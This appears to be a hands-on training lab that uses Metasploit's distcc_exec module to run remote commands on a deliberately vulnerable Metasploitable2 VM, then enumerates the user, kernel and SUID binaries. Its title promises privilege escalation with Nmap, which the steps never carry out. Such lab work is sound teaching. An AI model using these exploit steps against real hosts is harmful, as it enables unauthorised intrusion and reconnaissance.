Perform Privilege Escalation on Linux Machine with Nmap

КибербезопасностьBeginner
Практиковаться сейчас

Introduction

In this lab, you will use Metasploit to exploit the distcc service on a vulnerable Linux target, confirm the remote execution context you obtain, and collect basic system information from that target. The workflow uses one remote command at a time from the Metasploit module prompt instead of an interactive shell session.

The distcc module on this target is reliable for remote command execution through cmd/unix/generic, but it does not open a persistent shell in this environment. The main learning goal is to recognize that behavior, verify which remote account executed each command, and continue enumerating the target with deliberate follow-up commands.

Prepare the Environment

In this step, we will start the necessary components of the lab environment, including the Kali Linux container and the Metasploitable2 virtual machine.

  1. Start the Metasploitable2 virtual machine by executing the following command in the terminal:
sudo virsh start Metasploitable2

Wait for the target machine to start, it may take 1-3 minutes.

  1. Test if the virtual machine has started by pinging the target IP address:
ping 192.168.122.102

Press Ctrl+C to stop the ping.

  1. Start the Kali Linux container and enter its bash shell:
docker run -ti --network host b5b709a49cd5 bash
  1. Within the Kali container, test the network connectivity by pinging the target hostname:
ping 192.168.122.102

Press Ctrl+C to stop the ping.

Gain Initial Access to the Target Machine

In this step, we will use the Metasploit Framework (MSF) in the Kali container to gain initial access to the Metasploitable2 target machine.

  1. Within the Kali container, start the Metasploit console:
cd ~
msfconsole
  1. Within the Metasploit console, use the distcc_exec exploit module:
use exploit/unix/misc/distcc_exec
  1. Set the payload to generic remote command execution. In this environment, the module does not open a stable interactive shell, so you should run one remote command at a time:
set payload cmd/unix/generic
  1. Set the target host IP address:
set RHOST 192.168.122.102
  1. Set the first remote command you want to run on the target:
set CMD whoami
  1. Launch the exploit to run that command on the target machine:
run

After a successful run, you should see output similar to 192.168.122.102:3632 - stdout: daemon. That result means the command ran on the remote Metasploitable2 host as the daemon user.

Stay at the msf6 exploit(unix/misc/distcc_exec) > prompt for the next steps. For each new remote command, update CMD and run the module again.

Verify Current User Privileges

After gaining remote command execution, we need to check which account the target used for the command and whether it already has elevated privileges.

  1. If you left the distcc_exec module prompt, repeat the Metasploit setup from Step 2 so you are back at msf6 exploit(unix/misc/distcc_exec) >.

  2. Set the remote command to check the current user:

set CMD whoami
  1. Run the module to execute that command on the target:
run
  1. Set the next remote command to display the user ID and group information:
set CMD id
  1. Run the module again:
run

If the output shows stdout: daemon and uid=1(daemon) gid=1(daemon), the exploit is executing commands remotely as the daemon account rather than as root. You would need an additional privilege-escalation technique to go further, but for this lab we will stay focused on validating access and collecting reconnaissance data.

Stay at the same Metasploit module prompt for the next step.

Enumerate System Information

Now that you have confirmed your access level, gather a few details from the target system so you can identify what kind of host you compromised.

  1. If you left the distcc_exec module prompt, repeat the Metasploit setup from Step 2 so you are back at msf6 exploit(unix/misc/distcc_exec) >.

  2. Set the remote command to check the Linux distribution banner:

set CMD "cat /etc/issue"
  1. Run the module:
run

Here's an example of the output you might see from the target:

                _                  _       _ _        _     _      ____
 _ __ ___   ___| |_ __ _ ___ _ __ | | ___ (_) |_ __ _| |__ | | ___|___ \\
| '_ ` _ \\ / _ \\ __/ _` / __| '_ \\| |/ _ \\| | __/ _` | '_ \\| |/ _ \\ __) |
| | | | | |  __/ || (_| \\__ \\ |_) | | (_) | | || (_| | |_) | |  __// __/
|_| |_| |_|\\___|\\__\\__,_|___/ .__/|_|\\___/|_|\\__\\__,_|_.__/|_|\\___|_____|
                            |_|

Warning: Never expose this VM to an untrusted network!
Login with msfadmin/msfadmin to get started
  1. Set the next remote command to check the kernel version:
set CMD "uname -a"
  1. Run the module again:
run

Here's an example of the output you might see from the target:

Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux
  1. Set the remote command to find SUID files that could potentially be useful for later post-exploitation analysis:
set CMD "find / -perm -u=s -type f 2>/dev/null"
  1. Run the module one more time:
run

Review the list to understand which privileged binaries are present on the target. The exact entries can vary, but you should see paths such as /usr/bin/sudo and /usr/bin/nmap from the compromised host.

After you finish inspecting the output, you can exit Metasploit with exit.

Summary

In this lab, you started the LabEx environment, used the Metasploit Framework to exploit the vulnerable distcc service, and executed remote commands against the Metasploitable2 target through cmd/unix/generic. You then verified the remote execution context with whoami and id so you could confirm which account the exploit used before running follow-up commands.

You also gathered basic system information from the compromised host by checking its distribution banner, kernel version, and available SUID binaries. These post-exploitation checks are useful for confirming what access you gained and for planning further enumeration on a Linux target.